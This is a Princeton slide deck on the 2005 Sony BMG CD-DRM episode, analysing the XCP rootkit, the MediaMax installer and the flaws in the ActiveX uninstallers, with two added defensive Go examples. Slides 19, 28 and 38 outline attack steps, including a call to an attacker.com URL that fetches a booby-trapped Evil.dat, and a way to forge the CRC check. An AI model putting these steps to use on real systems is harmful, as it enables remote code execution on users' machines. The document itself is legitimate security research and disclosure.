Slide 1: Lessons from the Sony CD-DRM Episode
J. Alex Halderman and Edward W. Felten
Center for Information Technology Policy, Department of Computer Science, Princeton University

Slide 2: The “Episode” - Fall 2005
- World’s second largest music company
- Major anti-piracy plan, gone badly awry
- Millions of copies of dangerous software
- Hundreds of thousands of PCs at risk
- International protests, class-action suits
- Multi-million dollar recall, settlements
- Changed perceptions of DRM: showed it can be a security threat

Slide 3
- First4Internet: 52 titles, 4.7 million discs
- SunnComm (“Light years beyond encryption™”): 37 titles, 20 million discs

Slide 4: Research in the Blogosphere
- 27 blog posts, 100s of comments
- Rapid collaboration with researchers (and amateurs) around the world
- Paper sections posted online while writing

Slide 5: Our Contributions
- XCP rootkit privilege escalation attack
- XCP and MediaMax uninstaller remote exploits
- MM patch triggers the attack it purports to fix
- MM spyware-like behaviors
- MM watermark technology analysis and attacks
- Analysis and holes in active and passive CD DRM
- XCP contains GPL code to work with iPod DRM
- Analysis of CD DRM security problems in the broader context of computer security

Slide 6: CD DRM
- CD players: plays normally
- Computers: restricted use, e.g. can’t copy disc, can’t rip as MP3, can’t use on iPod

Slide 7: How CD DRM Works
First time a protected CD is inserted…
1. Autorun (normal Windows feature) executes installer from the CD
2. Installs active protection driver, between CD driver and apps
3. Driver remains on system
[Diagram labels: Ripper/copier application, OS, Protection driver, Drivers]

Slide 8: How CD DRM Works
User tries to rip or copy a disc…
1. Protection driver checks for watermark
2. If found, blocks access to audio
[Diagram: the same stack (Ripper/copier application, OS, Protection driver, Drivers) shown twice, once for a normal CD and once for a CD marked as protected]

Slide 9: Taxonomy of Attacks
- Prevent installation
  - Shift key
  - Magic marker
  - Non-Windows OS
- Interfere with watermark detection
- Disable or remove protection software

Slide 10: DRM Challenges → Bad Behavior
DRM weaknesses prompted vendors to resort to dangerous/unethical techniques that jeopardized user security
- XCP rootkit
- MM aggressive installation
- XCP and MM ActiveX-based uninstallers

Slide 11: The XCP Rootkit
DRM challenge: Users will remove active protection
XCP’s response: Install a rootkit to conceal the software

Slide 12: XCP Rootkit: Discovery
Mark Russinovich, October 31, 2005

Slide 13: XCP Rootkit: Operation
Magic prefix: $sys$
Hidden: files, processes, registry keys

Slide 14: XCP Rootkit: Problems
- Local privilege escalation
  - Hidden objects not limited to XCP software
  - Malware run by non-privileged users can’t install its own rootkit, but can utilize XCP’s
  - Use to hide from virus checkers, admin tools
- Exploits in wild: Backdoor.Ryknos.B, Trojan.Welomoch

Slide 15
“Most people, I think, don't even know what a Rootkit is, so why should they care about it?”
— Thomas Hesse, President, Sony BMG Global Digital Business
“It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.”
— Stewart Baker, Asst. U.S. Secretary of Homeland Security

Slide 16: MediaMax Aggressive Installer
DRM challenge: Users will decline to install protection software
MM’s response: Install aggressively, regardless of consent

Slide 17: MediaMax Installation
- 13+ MB installed before EULA screen
- Commonly, active protection permanently activated even if EULA declined

Slide 18: MediaMax Installation: Problem
Everyone — Full Control
Jesse Burns and Alex Stamos, December 6, 2005

Slide 19: MediaMax Installation: Attack
1. Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function
2. Non-privileged user replaces installed file with attack version
3. Privileged user inserts CD
4. Even before displaying a EULA, software on CD calls MediaMax.dll code to check version
5. Attack code runs with privileges

Slide 20: Aggression Exacerbates Repairs
- Permissions reset to non-secure state whenever disc inserted.
- Sony releases patch… but the patch calls code in MediaMax.dll. If already booby-trapped, it will set off attack code.
- How do users know they need to patch? Vulnerable even if they have refused installation.

Slide 21: XCP and MediaMax Uninstallers
DRM challenge: Angry customers demand to uninstall protection software
XCP and MM response: Offer uninstallers, but use online design to limit access

Slide 22: XCP Uninstaller: Step 1

Slide 23: XCP Uninstaller: Step 2
Wait for email (hours)

Slide 24: XCP Uninstaller: Step 3

Slide 25: XCP Uninstaller: Step 4
Wait for second email (several days)

Slide 26: XCP Uninstaller: Step 5
Finally, visit web page and run uninstaller*
* But if you insert the CD again, go back to step 1!

Slide 27: XCP Uninstaller: Operation
1. XCP Uninstall web page: CodeSupport.Uninstall("http://www.sony-bmg.com/XCP.dat")
2. Client (CodeSupport.ocx) sends “HTTP GET /XCP.dat” to server sony-bmg.com, which returns XCP.dat
3. Client extracts InstallLite.dll from XCP.dat, calls function UnInstall_xcp
Problems:
- ActiveX control will accept arbitrary URL
- Code from that URL is not authenticated
- Control is not removed after use

Slide 28: XCP Uninstaller: Attack
1. Attacker constructs Evil.dat: creates InstallLite.dll and puts attack code in UninstallXCP function
2. Victim visits attacker’s web page: CodeSupport.Uninstall("http://www.attacker.com/Evil.dat")
3. Client (CodeSupport.ocx) sends “HTTP GET /Evil.dat” to server attacker.com, extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP
4. Attack code runs with local user’s privileges.

Slide 29: MediaMax Uninstaller
“Oops!... I did it again”

Slide 30: MediaMax Uninstaller
1. MediaMax Uninstall web page: AxWebRemove.Remove(3984-9201-0039-2257, "http://www.sunncomm.com/validate.asp")
2. Client (AxWebRemove.ocx) sends “GET /validate.asp?key=3984-…” to server sunncomm.com, which replies “http://sunncomm.com/webrem.dll”
3. Client (AxWebRemove.ocx) sends “GET /webrem.dll” to server sunncomm.com, which returns WebRem.dll
4. Client calls function ECF7() from WebRem.dll

Slide 31: Aftermath
- XCP discs recalled; MediaMax halted
- …but still in many stores and CD collections
- Major class-action suits settled
- Customers can trade discs for cash, MP3 downloads, and non-DRM versions
- Sony won’t use CD DRM, for now

Slide 32: Takeaway Lessons
- Aggressive DRM can have dangerous consequences: harm to user security
- Effective DRM may require undermining the user’s control… and thus ability to defend against security threats
- Look for similar problems in the future

Slide 33: The Stakes are High
Bad DRM can…
- Harm users
- Create major liability for content owners
- Reduce sales for artists
- Ultimately, reduce incentives to create

Slide 34: www.freedom-to-tinker.com
Lessons from the Sony CD-DRM Episode
J. Alex Halderman and Edward W. Felten
Center for Information Technology Policy, Department of Computer Science, Princeton University

Slide 35: Chronology
- Oct. 31: Rootkit revealed
- Nov. 3: Sony releases XCP patch
- Nov. 10: First suits filed against Sony
- Nov. 14: XCP patch/uninstaller hole
- Nov. 15: Sony recalls XCP discs
- Nov. 17: MediaMax uninstaller hole
- Dec. 6: MediaMax player hole
- Dec. 7: Hole in patch for MediaMax player hole
- Dec. 30: First suits settled

Slide 36: XCP Rootkit: Operation
Normal Windows system call (list files in a directory)
KeServiceDescriptorTable:
  KeQueryDirectoryFile      0x8060bb9c
  KeCreateFile              0x8056b9c8
  KeQuerySystemInformation  0x805ca104
  KeEnumerateKey            0x805010d0
  KeOpenKey                 0x805c9e3c
  …                         …
Application: KeQueryDirectoryFile(…);
Windows Kernel, 0x8060bb9c: int KeQueryDirectoryFile(…) { … }

Slide 37: XCP Rootkit: Operation
KeServiceDescriptorTable:
  KeQueryDirectoryFile      0x0f967bfa
  KeCreateFile              0x8056b9c8
  KeQuerySystemInformation  0x805ca104
  KeEnumerateKey            0x805010d0
  KeOpenKey                 0x805c9e3c
  …                         …
Application: KeQueryDirectoryFile(…);
Rootkit (Aries.sys), 0xf967bfa: int Rootkit_QueryDirectoryFile(…) { … if filename begins with “$sys$”: remove from results }
Windows Kernel, 0x8060bb9c: int KeQueryDirectoryFile(…) { … }
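
Added example (not from the original slides): a dispatch-table audit that flags any slot whose handler address lies outside the kernel image, which is how the redirected KeQueryDirectoryFile entry on slide 37 stands out from the clean table on slide 36. Service names and handler addresses are the ones on the slides; the kernel and Aries.sys load ranges and all Go identifiers are constructed assumptions.

```go
package main

import "fmt"

// Entry is one slot of the dispatch table: service name and handler address.
type Entry struct {
	Name string
	Addr uint32
}

// Image is the address range [Base, End) of a loaded kernel-mode module.
type Image struct {
	Name      string
	Base, End uint32
}

// Constructed load ranges (assumptions, not taken from the slides).
var kernelImg = Image{"kernel", 0x804d7000, 0x806ff000}
var drivers = []Image{{"Aries.sys", 0x0f967000, 0x0f96d000}}

// SlideTable returns the table shown on the slides, with the given address
// placed in the KeQueryDirectoryFile slot.
func SlideTable(queryDir uint32) []Entry {
	return []Entry{
		{"KeQueryDirectoryFile", queryDir},
		{"KeCreateFile", 0x8056b9c8},
		{"KeQuerySystemInformation", 0x805ca104},
		{"KeEnumerateKey", 0x805010d0},
		{"KeOpenKey", 0x805c9e3c},
	}
}

// AuditTable reports every slot whose handler lies outside the kernel image,
// formatted as "service -> address (owning module)".
func AuditTable(table []Entry, kernel Image, mods []Image) []string {
	var findings []string
	for _, e := range table {
		if e.Addr >= kernel.Base && e.Addr < kernel.End {
			continue // handler is inside the kernel image: expected
		}
		owner := "unknown module"
		for _, m := range mods {
			if e.Addr >= m.Base && e.Addr < m.End {
				owner = m.Name
			}
		}
		findings = append(findings, fmt.Sprintf("%s -> 0x%08x (%s)", e.Name, e.Addr, owner))
	}
	return findings
}

func main() {
	fmt.Println("clean: ", AuditTable(SlideTable(0x8060bb9c), kernelImg, drivers))
	fmt.Println("hooked:", AuditTable(SlideTable(0x0f967bfa), kernelImg, drivers))
}
```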

Slide 38: Constructing Evil.dat
Archive files protected with proprietary CRC
Header: Name=“UninstallXCP.dat” CRC=0x03cb1a88
ActiveX control:
1. C = ComputeCRC( )
2. If C != Header.CRC then Terminate
3. Extract and execute file
Attack:
1. Prepare Evil.dat with random CRC
2. Run with breakpoint at line 2
3. Take computed CRC and place in Evil.dat
Lesson: Use a digital signature!
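
Added example (not from the original slides, and not the vendor's code): the slide's lesson in working form, contrasting the header CRC check with a loader that fixes the first two problems listed on slide 27 by pinning the download source and requiring a publisher signature. CRC-32 stands in for the proprietary CRC, Ed25519 is an assumed choice of signature scheme, and the host name, keys and all Go identifiers are constructed.

```go
package main

import (
	"crypto/ed25519"
	"fmt"
	"hash/crc32"
	"net/url"
)

// Package models a downloaded archive: payload plus header fields.
type Package struct {
	Payload []byte
	CRC     uint32 // checksum stored in the header
	Sig     []byte // Ed25519 signature over Payload
}

// CRCCheck is the slide's check: recompute and compare. Anyone who can build
// a package can compute this value, so it says nothing about who built it.
func CRCCheck(p Package) bool { return crc32.ChecksumIEEE(p.Payload) == p.CRC }

// Verify accepts a package only from the pinned HTTPS host and only with a
// valid signature from the pinned publisher key.
func Verify(rawURL, pinnedHost string, pub ed25519.PublicKey, p Package) error {
	u, err := url.Parse(rawURL)
	if err != nil || u.Scheme != "https" || u.Hostname() != pinnedHost {
		return fmt.Errorf("untrusted source %q", rawURL)
	}
	if !ed25519.Verify(pub, p.Payload, p.Sig) {
		return fmt.Errorf("signature does not match pinned publisher key")
	}
	return nil
}

// Build produces a package with a correct CRC, signed by whoever holds priv.
func Build(payload []byte, priv ed25519.PrivateKey) Package {
	return Package{payload, crc32.ChecksumIEEE(payload), ed25519.Sign(priv, payload)}
}

// Constructed demo keys (fixed seeds so the example is reproducible).
var priv = ed25519.NewKeyFromSeed(make([]byte, ed25519.SeedSize))
var pub = priv.Public().(ed25519.PublicKey)
var otherPriv = ed25519.NewKeyFromSeed(append(make([]byte, 31), 1))

const src, host = "https://vendor.example/pkg.dat", "vendor.example"

func main() {
	good, other := Build([]byte("uninstaller v1"), priv), Build([]byte("other code"), otherPriv)
	fmt.Println(CRCCheck(good), CRCCheck(other)) // the CRC accepts both
	fmt.Println(Verify(src, host, pub, good), Verify(src, host, pub, other))
}
```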

Slide 39: CD DRM as Spyware
Both XCP and MediaMax:
- “Phone home” about each title played despite privacy statement to the contrary
- Ship without a meaningful uninstaller
- Install without consent or exceed consent
Spyware is hard to define, but these meet most common definitions.

